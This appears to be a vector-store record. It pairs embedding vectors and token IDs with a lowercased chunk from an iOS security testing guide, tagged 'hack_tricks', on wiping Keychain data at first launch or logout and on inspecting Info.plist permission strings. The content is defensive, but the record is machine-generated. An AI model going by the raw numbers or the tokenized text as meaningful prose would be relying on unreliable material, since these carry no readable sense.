0.5959362387657166, 0.06164292246103287, 0.3385779559612274, 0.6243472099304199, -0.2788335978984833, -0.22122764587402344, -0.299784392118454, 0.8093432188034058, 0.1615675836801529, -0.4857703745365143, 0.3602117598056793, 0.07889700680971146, 0.2363833487033844, -0.5249030590057373, -0.2128623127937317, 0.6670463681221008, 0.010837366804480553, -0.09105709195137024, 0.22269688546657562, 0.006611742544919252, 0.1761479377746582, 0.8347916007041931, -0.19872985780239105, -0.392696350812912, 0.8343032002449036, -0.2726726531982422, 0.28235918283462524, -0.5773183703422546, 0.9492860436439514, -0.6528818607330322, -0.33149921894073486, 0.3858770430088043, 0.642788290977478, -0.6104421615600586, -0.6082281470298767, 0.2558194398880005, 0.1772022694349289, 0.024930056184530258, 0.7590216994285583, -0.29020562767982483, 0.07240310311317444, -0.3776834309101105, -0.9451596140861511, -0.5229756236076355, 0.3303261697292328, 0.4378565549850464, 0.4914478361606598, 0.5267893075942993, 0.6770150661468506, 0.8289915919303894, -0.36877748370170593, 0.6149998903274536, -1.2688302993774414, -0.015705185011029243, -0.16781596839427948, 1.1281788349151611, -0.27148017287254333, -0.5205356478691101, -0.6576923131942749, -0.05688708275556564, -0.47180718183517456, 0.24577772617340088, 0.354511559009552, 0.6360381245613098, -0.3974904716014862, -0.5381984114646912, 0.3019007444381714, 0.358010470867157, -0.477974534034729, -0.036795925348997116, 0.03927132114768028, -0.4343406856060028, 1.1935226917266846, -0.3340253531932831, 0.329705148935318, -0.5366145968437195, -0.06562539935112, 0.0364200659096241, -0.2529388666152954, -0.7020869255065918, -0.4907512664794922, -0.34620076417922974, -0.4025542140007019, 0.14480985701084137, 0.6041348576545715, 0.4999692440032959, -0.02264684997498989, -1.1069815158843994, -0.05994980037212372, 0.9909572005271912, -0.22538650035858154, -0.5724815726280212, -0.009139660745859146, 0.3218158185482025, 0.20830397307872772, 0.5902235507965088, -0.5414680242538452, -0.5562013387680054, 0.2625032961368561, -1.1135528087615967, 0.8040443062782288, -0.4977983236312866, -0.12972424924373627, -0.08376821130514145, 0.6739534735679626, 0.16486606001853943, 0.5094114542007446, -0.33715400099754333, 0.3198775351047516, -0.046993207186460495, -0.1274997591972351, -0.4014337360858917, -0.44829896092414856, 0.727662205696106, 0.014467710629105568, -0.570526659488678, 0.6333653330802917, 0.0451379157602787, -0.07241564989089966, -0.07976898550987244, -0.6778013706207275, -0.728203535079956, 0.5760960578918457, -0.1105700209736824, 0.5567271709442139, -0.06159015744924545, -0.06339509040117264, -0.22382381558418274, -0.057343367487192154, 0.9502434730529785, -0.6553888916969299, 0.326416552066803, -0.8143067955970764, -0.652567982673645, -0.10661233961582184, 0.08419672399759293, -0.0753246620297432, 1.1465343236923218, 0.023694729432463646, -0.378277063369751, -0.4682120084762573, -0.3111475110054016, -0.42940160632133484, -0.4044134318828583, -0.7265228033065796, -0.27679771184921265, 0.2100355178117752, -0.4050675332546234, 0.20576834678649902, 0.17355762422084808, -0.5454903244972229, 0.7720726132392883, 0.4386504888534546, 0.03345252946019173, -0.9098315834999084, -0.2238704413175583, -0.1370619386434555, -0.11303725093603134, -0.03517879918217659, 0.5660859942436218, -0.09602602571249008, 0.056464869529008865, 0.13888387382030487, 0.6449925303459167, 0.5799251794815063, -0.028867051005363464, -0.05791519954800606, 0.1941034346818924, 0.6207960247993469, -0.8866548538208008, 0.03115432895720005, 1.1509422063827515, -0.14989294111728668, 0.2904832363128662, -0.6333069205284119, -0.40183398127555847, -0.23565194010734558, -0.7359172701835632, 0.07866315543651581, -0.28524845838546753, 0.6045269966125488, -0.8978898525238037, -0.6343669295310974, -0.45540663599967957, 0.5030798316001892, -0.5470026135444641, -0.6031773090362549, -0.16425721347332, -0.1171862781047821, 0.05355040729045868, -0.016750408336520195, -0.33372586965560913, -0.7350555062294006, -0.46193748712539673, 0.07394468784332275, 0.24942028522491455, 0.11741162836551666, -0.024356869980692863, 0.013253813609480858, 0.05194946750998497, 0.29435914754867554, -0.2744433283805847, -0.9694711565971375, -0.4272303283214569, -0.041518598794937134, 0.8994334936141968, -0.4049043655395508, 0.7947070002555847, -0.9133237600326538, 0.6721240878105164, -0.02828357368707657, 0.18155738711357117, 0.24762548506259918, -0.030803583562374115, 0.03741180896759033, 0.6486276984214783, 0.8131057620048523, -0.8153431415557861, -0.19634997844696045, -0.18024122714996338, 0.24010398983955383, 0.1741650402545929, -0.021703559905290604, -0.6738344430923462, 0.09048441052436829, -0.5999355316162109, -1.642736792564392, 0.5000138282775879, 0.08485016971826553, -0.05021063983440399, -0.17688004672527313, -0.03888867795467377, 0.4626738727092743, 0.4355614483356476, -0.11506407707929611, 1.1820964813232422, -0.0019151486922055483, 0.16474737226963043, -0.6369433999061584, 0.988528311252594, 0.31944823265075684, -0.6778969168663025, -0.06326921284198761, -0.551413357257843, 0.35980498790740967, 0.1030338779091835, -0.09045256674289703, -0.09475606679916382, -1.296307921409607, -0.3282887041568756, 0.5445374250411987, 0.2264304757118225, 0.5269778966903687, 0.07869234681129456, -0.6335993409156799, -0.0429161973297596, -0.24891190230846405, 0.0259995236992836, 0.4634448289871216, 0.6123760342597961, 0.7395374774932861, -0.2832915782928467, -0.7761244773864746, 0.20228047668933868, -0.4489901065826416, -0.35110047459602356, 0.7243515849113464, 0.272289901971817, -0.6499648690223694, 0.7286814451217651, 0.7356836795806885, -0.6785107254981995, -0.8594707250595093, -0.018208032473921776, -0.4242287278175354, 0.48876523971557617, -0.15255479514598846, -0.14682331681251526, 0.48188167810440063, 0.07695920020341873, 0.2714594006538391, 0.10258731991052628, 0.4024337828159332, 0.24186070263385773, -0.5902156829833984, 0.664739191532135, -0.46071335673332214, -0.6238549947738647, 0.4977376461029053, -1.2915722131729126, -0.5540468692779541, -0.8969855308532715, 0.1278139054775238, -0.23779162764549255, 0.10013417899608612, 0.8858224153518677, -0.14871260523796082, -0.17448671162128448, -0.03571232780814171, -0.5242493152618408, 0.5338606238365173, 0.36057519912719727, 0.4669707119464874, 1.427471399307251, -0.07233089953660965, -0.2727890908718109, -0.1690116822719574, 0.6530578136444092, -0.10805197060108185, -0.10910019278526306, -0.5454229712486267, 0.4624205529689789, 0.0742628425359726, 0.6052161455154419, -0.7126820087432861, -0.07267151027917862, -0.49729400873184204, -0.9097583293914795, -0.231445774435997, -0.3795243501663208, -0.3516622483730316, -0.23039370775222778, 0.4239785671234131, -0.3315497040748596, -0.15489394962787628, -0.2322903424501419, 0.9717104434967041, -0.9995872378349304, -0.03192305564880371, -0.6412647366523743, 0.4756511449813843, -0.5107432007789612, -0.9673386812210083, -0.7583267688751221, -0.46473389863967896, -0.9483044743537903, -0.39439865946769714, -0.818727970123291, 0.11219150573015213, -0.7459842562675476, 0.534334123134613, -0.7261209487915039, 0.08074945956468582, -0.2220814973115921, -0.5256696939468384, -0.12078665941953659, 1.1648751497268677, -0.15068498253822327, -0.3664301037788391, 0.23623855412006378, 0.6564654111862183, 0.8303784132003784, -0.2603086829185486, 0.0656079426407814, 0.4706912636756897, 0.3095647394657135, 0.07183174043893814, 0.31718847155570984, 0.18382444977760315, -0.06757500767707825, -0.14347325265407562, -0.3336808979511261, 0.47775524854660034, -1.0112687349319458, 0.11240153014659882, 0.47455623745918274, -0.3419189751148224, 0.5739871263504028, 0.3679979145526886, 0.14726541936397552, 0.34142449498176575, -0.11669082939624786, 0.7502703070640564, 0.6069796681404114, 0.26213520765304565, 0.1137658953666687, 0.36757704615592957, 0.7426362633705139, -0.8873238563537598, -0.6451457738876343, -0.4630562365055084, -0.9913854598999023, -0.2099790722131729, -0.38291463255882263, -0.7046670913696289, -0.5263890624046326, -0.23819600045681, 0.44611480832099915, 0.08128661662340164, 0.9519663453102112, 0.15518797934055328, 0.23395799100399017, 0.2764521837234497, -0.6814847588539124, 0.1158859059214592, -0.8884937763214111, -0.3796055018901825, 0.25685471296310425, -0.07799363136291504, -0.5347968935966492, -0.6879913210868835, -0.3266434669494629, 0.11375351995229721, 0.1145567074418068, 0.40695497393608093, 0.11868675798177719, 0.14204853773117065, -0.4055483341217041, 0.3942597508430481, -0.3214198052883148, -0.1618296355009079, -0.40275052189826965, 1.2045083045959473, -1.1694846153259277, -1.0808725357055664, -0.2442259043455124, 0.9732587933540344, 0.6144339442253113, -0.3352154791355133, -0.798236608505249, -0.263931542634964, 0.8576324582099915, -0.7501260638237, 0.5763716697692871, 0.36769649386405945, -0.9968190789222717, 0.728022038936615, -0.7680407762527466, 0.01533577498048544, -0.028360195457935333, 0.0030272752046585083, 0.18589329719543457, -0.3936379551887512, 0.07194250822067261, 0.3093969523906708, -0.23993296921253204, -0.43378809094429016, 0.8840638995170593, 0.2210237830877304, 0.6897626519203186, -0.512237548828125, -0.015811044722795486, -0.6434237360954285, 0.15193775296211243, 0.6830398440361023, -0.09653160721063614, -0.44972339272499084, -0.21713122725486755, 0.5845686197280884, -0.10421884059906006, 0.026228567585349083, 0.6053515076637268, 0.5838867425918579, -0.00856995303183794, 0.42239412665367126, 0.10599906742572784, -0.15893664956092834, -0.4814503490924835, -0.1300264447927475, -0.06828287243843079, 0.20864856243133545, 0.062038272619247437, -0.062256116420030594, -0.40174734592437744, 0.7545016407966614, -0.19519305229187012, 0.8708301186561584, 0.041670266538858414, -0.16830724477767944, -0.007740836124867201, -0.4184569716453552, -0.9432849287986755, 0.2858172357082367, 1.0307878255844116, 0.1788320243358612, 0.8028759956359863, 0.39789241552352905, -0.2337299883365631, -0.308588445186615, 1.1889046430587769, -0.20844526588916779, -0.5926711559295654, 0.02338213287293911, 0.4186913073062897, -0.9025633931159973, -0.7025462985038757, 0.5007840991020203, 0.039310432970523834, -0.33239108324050903, 0.39651304483413696, -0.04435916617512703, 0.47213882207870483, -0.06798720359802246, 0.48772457242012024, -0.1579291969537735, -0.06944047659635544, 0.11807689815759659, -0.23671381175518036, -1.3140144348144531, 0.6348875164985657, -0.5684810876846313, 0.6690942049026489, 0.2758844494819641, 0.1958213746547699, -0.09805434942245483, 0.05037391930818558, -0.06820983439683914, -0.628556489944458, -0.10542291402816772, -0.23189905285835266, -0.043195635080337524, -0.18144026398658752, -0.12275456637144089, -0.2970059812068939, 0.22496935725212097, -0.5145056247711182, -0.4134485125541687, -1.0836659669876099, 0.2669815719127655, -0.10969195514917374, -0.5951043367385864, 0.1182364970445633, -0.28982052206993103, -0.2787236273288727, 0.12265774607658386, -0.276858925819397, -0.036810774356126785, 0.6720187664031982, -0.8157743811607361, -0.5866219997406006, -0.24934719502925873, -0.15624399483203888, -0.29493096470832825, 0.47446954250335693, -0.5863648653030396, -0.22607138752937317, 0.04268936440348625, -0.862754225730896, -0.5680181384086609, 0.3772621154785156, -0.5368220806121826, -0.2363131195306778, 0.5153531432151794, 0.14583370089530945, 0.8387845754623413, 0.5342270731925964, 0.44268155097961426, 0.019457843154668808, 0.6396459341049194, 0.41877880692481995, -1.0507843494415283, 0.8536026477813721, 0.7847095131874084, -0.4138539731502533, 0.08428037166595459, -0.4234718680381775, 0.6170741319656372, -0.5424259305000305, -0.5785641074180603, -0.16747495532035828, -0.3343393802642822, -0.8422566652297974, -0.3541986644268036, -0.2505802512168884, -0.42653295397758484, -0.21932175755500793, 0.05344314128160477, -0.8677166700363159, 0.35346296429634094, -0.7299655675888062, 0.897766649723053, 0.18277426064014435, 0.16762644052505493, 0.4191816449165344, -0.10648998618125916, 0.6173145174980164, -1.6361693143844604, 4.155348777770996, 0.5533744096755981, 0.4520616829395294, 0.5368111729621887, 0.14576764404773712, 0.9535179138183594, 1.071388602256775, -0.7013747096061707, -0.4986492097377777, -0.2976323068141937, 0.1986793726682663, 0.10554734617471695, 0.5652515888214111, -0.26232948899269104, 0.22796432673931122, 0.315856397151947, -0.40342190861701965, 0.6655842661857605, 0.12427202612161636, -0.7139204144477844, -1.2015480995178223, 0.16384132206439972, -0.36871930956840515, 0.7381690144538879, 0.09914369136095047, 0.7874639630317688, 0.3413875102996826, -0.8492160439491272, -0.7191923260688782, -0.17453604936599731, 0.13634799420833588, -0.6545799970626831, 0.3473933935165405, -0.4866616129875183, -0.7885987162590027, 0.3332955837249756, 0.5862352252006531, -0.42498502135276794, -0.28575876355171204, -0.02680053561925888, 0.7055190801620483, -0.1386454850435257, 0.16484253108501434, -0.3129909336566925, 0.08391086757183075, 0.8149952292442322, -0.3012336492538452, 0.3328249454498291, 0.8932783603668213, 0.059063300490379333, 0.6853170990943909, -0.1498146504163742, 0.6723479628562927, -0.33458200097084045, -0.079007089138031, 0.008389505557715893, 0.7865858674049377, -0.42088043689727783, 0.19856618344783783, -0.14270362257957458, 0.12273415923118591, -0.4135979115962982, 0.22725296020507812, -0.8683263063430786, -1.203057050704956, 0.7251184582710266, 0.27125224471092224, 0.6578381061553955, 0.6915868520736694, -0.4136059880256653, -0.4317726492881775, -0.4903814494609833, -0.9555363059043884, -0.47863978147506714, 0.6827558279037476, -0.3090555965900421, 0.3801259696483612, 1.035419225692749, 0.3847852051258087, -0.7284697890281677, 0.11700575798749924, -0.5501169562339783, -0.9009507298469543, 0.22909007966518402, 0.8702685236930847, 0.6442621350288391, -0.18992571532726288, -0.8199815154075623, 0.38560396432876587, 0.3279819190502167, 0.7822427153587341, 0.13588853180408478, -0.5144452452659607, -0.3991142809391022, 0.44065433740615845 ]
[ 1007, 1024, 29535, 19281, 9468, 7971, 8663, 13181, 17920, 7903, 13699, 12054, 16044, 1024, 3229, 1996, 8875, 3081, 1037, 3413, 16044, 1012, 29535, 19281, 9468, 7971, 8663, 13181, 20850, 18994, 3388, 20444, 4890, 1024, 3229, 1996, 8875, 3081, 2028, 1997, 1996, 27556, 5068, 2000, 3543, 8909, 1012, 5815, 2030, 9268, 1037, 4344, 16550, 2180, 1005, 1056, 19528, 3686, 1996, 8875, 1012, 29535, 19281, 9468, 7971, 8663, 13181, 20850, 18994, 3388, 2854, 10841, 14343, 7666, 3388, 1024, 3229, 1996, 8875, 3081, 2028, 1997, 1996, 27556, 5068, 2000, 3543, 8909, 1012, 5815, 2030, 9268, 1037, 4344, 16550, 2097, 19528, 3686, 1996, 8875, 1012, 29535, 19281, 9468, 7971, 8663, 13181, 7393, 2121, 28994, 10127, 1024, 3229, 1996, 8875, 3081, 2593, 2028, 1997, 1996, 5068, 27556, 1006, 2478, 3543, 8909, 1007, 2030, 12398, 2000, 1996, 3413, 16044, 1012, 3531, 3602, 2008, 6309, 7119, 2011, 3543, 8909, 1006, 3081, 29535, 19281, 9468, 7971, 8663, 13181, 20850, 18994, 3388, 20444, 4890, 2030, 29535, 19281, 9468, 7971, 8663, 13181, 20850, 18994, 3388, 2854, 10841, 14343, 7666, 3388, 1007, 2024, 5123, 2011, 1996, 5851, 25867, 1024, 1996, 3145, 24925, 2078, 4324, 1037, 19204, 2069, 1010, 2025, 1996, 5025, 3145, 1012, 1996, 3145, 11665, 1999, 1996, 5851, 25867, 1012, 1996, 18059, 3594, 1996, 3413, 16044, 3107, 2011, 1996, 5310, 19829, 2075, 1996, 5080, 2000, 11703, 2854, 13876, 1996, 7800, 1999, 1996, 3145, 24925, 2078, 1012, 16380, 3594, 1996, 10439, 5178, 16778, 8873, 2121, 28139, 8873, 2595, 1006, 2136, 8909, 1007, 1998, 1996, 14012, 5178, 16778, 8873, 2121, 1006, 3024, 2011, 1996, 16475, 1007, 2000, 16306, 3229, 2491, 17428, 3145, 24925, 2078, 5167, 1012, 2059, 1010, 1996, 2168, 2136, 2064, 9530, 8873, 27390, 2063, 1016, 18726, 2000, 3745, 3145, 24925, 2078, 5167, 1012, 2043, 1037, 10200, 2832, 2003, 7531, 1996, 3145, 24925, 2078, 2951, 6153, 2039, 3464, 4372, 26775, 22571, 3064, 1998, 1996, 3145, 24925, 2078, 20786, 3475, 1005, 1056, 2443, 1999, 1996, 10200, 1012, 1999, 1037, 7173, 29162, 5080, 1996, 3145, 24925, 2078, 3475, 1005, 1056, 5123, 1012, 3145, 24925, 2078, 2951, 28297, 2239, 16380, 1010, 2043, 2019, 4646, 2003, 4895, 7076, 9080, 3709, 1010, 1996, 3145, 24925, 2078, 2951, 2109, 2011, 1996, 4646, 2003, 6025, 2011, 1996, 5080, 1010, 4406, 1996, 2951, 8250, 2011, 1996, 4646, 5472, 8758, 2029, 2003, 8342, 1012, 1999, 1996, 2724, 2008, 1037, 5310, 15187, 2037, 5080, 2302, 4488, 1037, 4713, 25141, 1010, 1996, 17634, 1997, 1996, 5080, 2089, 2022, 2583, 2000, 5114, 3229, 2000, 1996, 3025, 5310, 1005, 1055, 4646, 6115, 1998, 2951, 2011, 19222, 9080, 2989, 1996, 2168, 5097, 2109, 2011, 1996, 3025, 5310, 1012, 2023, 2052, 5478, 2053, 4087, 3754, 2000, 4685, 1012, 2045, 1005, 1055, 2053, 16380, 17928, 2008, 9797, 2064, 2224, 2000, 2486, 13387, 2951, 2043, 2019, 4646, 2003, 4895, 7076, 9080, 3709, 1012, 2612, 1010, 9797, 2323, 2202, 1996, 2206, 4084, 2000, 4652, 3145, 24925, 2078, 2951, 2013, 29486, 2075, 2090, 4646, 14111, 1024, 2043, 2019, 4646, 2003, 2034, 3390, 2044, 8272, 1010, 13387, 2035, 3145, 24925, 2078, 2951, 3378, 2007, 1996, 4646, 1012, 2023, 2097, 4652, 1037, 5080, 1005, 1055, 2117, 5310, 2013, 9554, 8550, 3229, 2000, 1996, 3025 ]
hack_tricks
430.txt
3
user's accounts. the following swift example is a basic demonstration of this wiping procedure : let userdefaults = userdefaults. standardif userdefaults. bool ( forkey : " hasrunbefore " ) = = false { / / remove keychain items here / / update the flag indicator userdefaults. set ( true, forkey : " hasrunbefore " ) userdefaults. synchronize ( ) / / forces the app to update userdefaults } when developing logout functionality for an ios application, make sure that the keychain data is wiped as part of account logout. this will allow users to clear their accounts before uninstalling an application. app capabilitieseach app has a unique home directory and is sandboxed, so that they cannot access protected system resources or files stored by the system or by other apps. these restrictions are implemented via sandbox policies ( aka. profiles ), which are enforced by the trusted bsd ( mac ) mandatory access control framework via a kernel extension. some capabilities / permissions can be configured by the app's developers ( e. g. data protection or keychain sharing ) and will directly take effect after the installation. however, for others, the user will be explicitly asked the first time the app attempts to access a protected resource. purpose strings or usage description strings are custom texts that are offered to users in the system's permission request alert when requesting permission to access protected data or resources. if having the original source code, you can verify the permissions included in the info. plist file : open the project with xcode. find and open the info. plist file in the default editor and search for the keys starting with " privacy - ". you may switch the view to display the raw values by right - clicking and selecting " show raw keys / values " ( this way for example " privacy - location when in use usage description " will turn into nslocationwheninuseusagedescription ). if only having the ipa : unzip the ipa. the info. plist is located in payload / < appname >. app / info. plist. convert it if needed ( e. g. plutil - convert xml1 info. plist ) as explained in the chapter " ios basic security testing ", section " the info. plist file ". inspect all purpose strings info. pl
[ 0.05261656641960144, -0.6765409708023071, 0.42721259593963623, 0.6435737013816833, -0.2841036021709442, -0.409890353679657, 0.10590996593236923, 0.33563530445098877, 0.3143976628780365, 0.6451737284660339, 0.4552741050720215, -0.1023600772023201, 0.1987232118844986, -0.3716326951980591, -1.0426995754241943, -0.1816807985305786, -0.5509448051452637, 0.0018207378452643752, -0.5382307171821594, 0.061345458030700684, 0.7750476002693176, 0.10683147609233856, -0.7802129983901978, -0.5445528626441956, -0.25884759426116943, 0.9414295554161072, 0.5694072246551514, -0.18512821197509766, 0.6082202792167664, 0.6804766058921814, -0.6977832317352295, -0.23491056263446808, 0.12054438143968582, -0.430493026971817, 0.08800356090068817, -0.33576157689094543, 1.008315920829773, -0.38442039489746094, -0.24485665559768677, -0.5825123190879822, 0.30702629685401917, -0.3689192533493042, 0.33217424154281616, -0.4251444637775421, -0.23835821449756622, -0.6396729350090027, -0.5384734272956848, -0.049609653651714325, -0.21064241230487823, 0.17376866936683655, 0.41190484166145325, -0.46767252683639526, -0.12374059110879898, -0.13450594246387482, 0.1646679937839508, -0.23391473293304443, -0.20165176689624786, 0.20379501581192017, -0.2902534008026123, 0.48824748396873474, -0.05402498319745064, 0.5378852486610413, -0.1522102802991867, -0.6975263953208923, 0.0796324759721756, 0.489706426858902, -0.15795813500881195, -0.38237419724464417, -0.49475303292274475, -0.08205097913742065, 0.2556251585483551, 0.7068693041801453, -0.6655093431472778, -0.875817596912384, -0.279402494430542, -0.5982918739318848, -0.28444722294807434, -0.4767093062400818, 0.13163654506206512, 0.9659345746040344, -0.21521398425102234, 0.4789029657840729, 0.16987162828445435, -0.30413398146629333, -0.4364411532878876, -0.17784442007541656, 0.5503721237182617, 0.6302438974380493, -0.46475356817245483, -0.2701927125453949, 0.4949910342693329, 0.3977406620979309, -1.0528993606567383, -0.6513981819152832, 0.6922748684883118, 1.1460682153701782, -0.06711816042661667, -0.5743275880813599, 0.06978223472833633, -0.5549840927124023, 1.2821917533874512, 0.2537245750427246, 0.24052299559116364, 0.43765997886657715, -0.22018183767795563, 0.11304744333028793, 0.8827825784683228, -0.09791241586208344, -0.16984273493289948, -0.4447336196899414, 0.6339491605758667, -0.1675005555152893, 0.29583051800727844, -0.3436889052391052, -0.2907761335372925, 0.43703174591064453, 0.5899686217308044, 0.16992229223251343, 0.10080916434526443, 0.44751909375190735, -0.18355904519557953, -0.5707827210426331, 0.04530301317572594, -0.6372452974319458, 0.5005604028701782, 0.07019032537937164, 0.6612388491630554, 0.6306405067443848, -0.7361631393432617, -0.4993090033531189, 0.14181281626224518, -0.12877315282821655, 0.6712874174118042, 0.6752517819404602, -0.47721871733665466, 0.4141085743904114, 0.35240525007247925, 0.4793089032173157, 0.2751460373401642, -0.8626128435134888, -0.14536438882350922, 0.6193633079528809, 0.18490372598171234, 1.3582253456115723, 0.6393061876296997, -0.1657058298587799, -0.558940589427948, -0.3878917694091797, -0.3291894495487213, 0.026679158210754395, 0.09246158599853516, 0.7453775405883789, 0.7208553552627563, -0.3729274272918701, -0.16399770975112915, 0.03523557260632515, -0.650050163269043, 0.6921904683113098, -0.5259124636650085, 0.2616559565067291, -0.20860780775547028, 1.1306278705596924, 0.4676780104637146, 0.5778362154960632, -0.6036951541900635, 0.4618803858757019, -0.7768200635910034, -0.132831409573555, 0.09428983181715012, 0.35509955883026123, 0.3197477459907532, -0.2950367331504822, 0.14426127076148987, -0.12754425406455994, 1.042240023612976, 0.8579390645027161, 0.009638089686632156, 0.42999714612960815, 0.29441553354263306, 0.2356743961572647, -0.28874078392982483, 0.5812116861343384, 0.49626651406288147, 1.2674808502197266, -0.2711572051048279, -0.17012256383895874, -0.797704815864563, -0.9148937463760376, -0.18269069492816925, -0.3877883553504944, -0.39807823300361633, 0.19494760036468506, -0.5065625905990601, 0.07399396598339081, 0.55417799949646, 0.2931431531906128, -0.7601398229598999, -0.20514929294586182, 0.33719515800476074, -1.5469131469726562, -0.21267366409301758, 0.2372426986694336, 0.02280573360621929, 0.2612636685371399, -0.3661288321018219, -0.3807532489299774, 0.8367387652397156, 0.4747522473335266, -0.049605593085289, 0.8600401878356934, 0.7385716438293457, -0.24908967316150665, -1.1304885149002075, 0.05221668630838394, -0.5078054666519165, -0.6810740828514099, 0.49735715985298157, 0.9001972675323486, 0.017628416419029236, 0.2771407961845398, 0.1890704482793808, 0.5416545867919922, 0.6797317862510681, 0.15238218009471893, -0.05767788738012314, -0.10261205583810806, -0.008144206367433071, 0.4631205201148987, -0.26879122853279114, 0.24891754984855652, -0.2601897120475769, 0.46695753931999207, 0.4218772351741791, 1.1542285680770874, -0.3398495316505432, -0.19767621159553528, 0.4186542332172394, 0.2503232955932617, 0.22865065932273865, -0.07391911000013351, -0.08381008356809616, 0.9150180220603943, 0.3615241050720215, 0.18517713248729706, 0.1545390784740448, 0.3040623366832733, 0.25562360882759094, 0.1371951550245285, 0.5482176542282104, 0.13985897600650787, -0.7085774540901184, 0.6565577983856201, 0.9303263425827026, -0.03048928827047348, -1.1825283765792847, -0.6158170104026794, 0.9818530678749084, 0.7128629684448242, -0.9364926218986511, -0.551792562007904, -0.4125650227069855, 0.5537589192390442, 0.1605520099401474, -0.7107024192810059, -0.28146108984947205, 0.33785945177078247, -0.3389991521835327, 0.6768065690994263, -0.3851025104522705, -0.5110794901847839, -1.0900778770446777, -0.5522240996360779, -0.9042477607727051, -0.6478224396705627, -0.718997061252594, -0.39783725142478943, 0.21167512238025665, -0.30268171429634094, 0.4314916431903839, -0.8354220390319824, -0.26370081305503845, 0.2843555510044098, 0.4223053455352783, 0.6619746685028076, 0.2121431678533554, -0.32115283608436584, -0.5926960706710815, 0.05109439417719841, 0.011283515021204948, 1.2564821243286133, -0.4095195531845093, 0.039256591349840164, -0.11531710624694824, -0.3930756449699402, -0.08828483521938324, -0.6476990580558777, 1.0628790855407715, -0.17238807678222656, -0.3264736831188202, 0.37663698196411133, 0.457854300737381, 0.3447330892086029, 0.807458221912384, 0.015578572638332844, -0.43223875761032104, 0.9269348382949829, 0.024819910526275635, -0.37955108284950256, 0.5787297487258911, 0.6916229128837585, -0.8428911566734314, -0.004656747914850712, 0.10493192076683044, 0.6204003095626831, -0.28172600269317627, 0.11255274713039398, 0.6782245635986328, -0.03642896190285683, -0.1233409196138382, -0.13426901400089264, -0.21045728027820587, -0.794333279132843, -0.34640437364578247, 0.23194554448127747, -0.38181445002555847, -0.13197863101959229, -0.21229009330272675, -1.308829665184021, 0.45970723032951355, -0.7261317372322083, -0.3611547350883484, -0.14032696187496185, -0.16473333537578583, 1.0113801956176758, 0.4843425154685974, 0.1750807911157608, -0.1484140008687973, -0.750042200088501, 0.3563561737537384, 0.7358212471008301, 0.2978057563304901, -0.5478494167327881, 0.35714781284332275, -0.48014259338378906, -0.7313536405563354, 0.6655946373939514, 0.49478358030319214, -0.5445985198020935, -0.2386321872472763, -0.3829043507575989, -0.055881187319755554, -0.31200936436653137, 0.11739987879991531, 0.45029157400131226, 1.0069056749343872, 0.49804478883743286, -0.4607195258140564, 0.11359161138534546, 0.28227925300598145, 0.10869645327329636, 0.3007342219352722, 0.270111083984375, 0.11201115697622299, 0.5604710578918457, 0.08745396882295609, -0.2869681715965271, -0.6361900568008423, 0.6728599667549133, 0.5067201256752014, -0.15264272689819336, 0.48425713181495667, -0.414125919342041, -0.2092607021331787, 0.8070424199104309, -0.6759833693504333, -0.48402056097984314, 0.8087572455406189, -0.23750276863574982, 0.4008048176765442, -0.637766420841217, 0.11278526484966278, -0.1263255476951599, -0.019596541300415993, 0.43373602628707886, 0.3615548312664032, -0.40715491771698, -0.9369747042655945, -0.4509769082069397, 0.13922320306301117, -0.07873627543449402, 0.5959452390670776, -0.24307358264923096, -0.21606957912445068, -0.3802039325237274, -1.152398943901062, -0.9498966932296753, 0.3299347460269928, 0.790661096572876, 0.7114362716674805, 0.5361388921737671, 0.9060904383659363, 0.5560741424560547, -0.11046066880226135, 0.03622089698910713, -0.5220886468887329, 0.44036439061164856, -0.15603181719779968, 0.587871789932251, -0.18397842347621918, -0.16286185383796692, -0.3017844557762146, 0.022916525602340698, -0.3550850450992584, 0.32048648595809937, 0.21439388394355774, 0.2738787531852722, -0.787572979927063, -0.773356020450592, -0.3399239182472229, -0.15416699647903442, -0.6671332120895386, -0.6625164151191711, -0.15908698737621307, 0.4309925436973572, 0.6994966268539429, -0.7588664293289185, 0.03531580790877342, -0.747011125087738, 0.0738505870103836, 0.4378160238265991, 0.23024868965148926, -0.4412831962108612, -0.6473752856254578, -0.21577207744121552, -0.8095523118972778, 0.5093615055084229, 0.44936618208885193, -0.09855145215988159, 0.18306727707386017, -0.8897837400436401, -0.09152695536613464, 1.0079761743545532, -0.6145986914634705, 0.013025983236730099, -0.22676846385002136, 0.4221152067184448, -0.0652434229850769, 0.5813359618186951, 0.12378274649381638, -0.12414348870515823, 0.3276483416557312, -0.6897082328796387, 0.4923572540283203, -1.1160293817520142, -0.334822416305542, -0.305086612701416, 0.3600085973739624, -0.03650037199258804, 0.6832726001739502, -1.1654669046401978, 0.1314169317483902, 0.28122183680534363, 0.2668415307998657, -0.1378900706768036, -0.49711695313453674, 0.8454626798629761, -0.12726464867591858, -0.7101203203201294, 0.6243102550506592, 0.15134406089782715, 0.11347601562738419, 0.19378910958766937, -0.3506518006324768, -0.7304837107658386, 0.8533772826194763, -0.6758298873901367, 1.2477928400039673, 0.17572279274463654, -0.048375923186540604, -0.21530087292194366, -0.31267985701560974, 0.4038451015949249, 0.2533467411994934, 0.47659316658973694, -1.391670823097229, -0.2724938988685608, 0.11168412864208221, -0.232510045170784, 0.5623583197593689, 0.7231660485267639, 0.40970489382743835, -0.12030899524688721, -0.3112472593784332, 0.2991712689399719, -1.2817274332046509, -0.6803414225578308, -1.172127604484558, -0.5698219537734985, -0.0047397306188941, -0.4722800552845001, 0.7238227128982544, -0.15553683042526245, -0.2684338390827179, 0.8533228635787964, 0.2197967916727066, -0.17254196107387543, -0.9905818104743958, -0.48598265647888184, -0.22476251423358917, 0.8009516000747681, -0.36805686354637146, 0.2460538148880005, -0.11129684746265411, 0.19603146612644196, 0.24013181030750275, 0.31675800681114197, -0.26674553751945496, 0.0352649986743927, -0.35191211104393005, 0.42507311701774597, -0.0011603585444390774, -0.3984685242176056, 0.3292962312698364, 0.11764457076787949, -0.12422440946102142, 0.1175541877746582, -0.6072147488594055, -0.7820737957954407, -0.7437605857849121, -0.262906014919281, 0.1398215889930725, -0.3244681656360626, 0.5059334635734558, -0.9144409894943237, -0.3078097105026245, 0.03322792053222656, 0.465927392244339, -0.053494952619075775, -0.7793835997581482, -0.067733533680439, -0.11965814232826233, 0.2203541398048401, -0.2327195256948471, -0.08752095699310303, -0.22660009562969208, -0.40327218174934387, 0.0363779217004776, 0.42383018136024475, -0.03055674210190773, -0.19375315308570862, 0.2727122902870178, -0.038616862148046494, 0.06430899351835251, -0.10778135061264038, -0.45119354128837585, -0.3353721499443054, -0.36529427766799927, 0.0843026414513588, -0.5004358887672424, 0.8589179515838623, 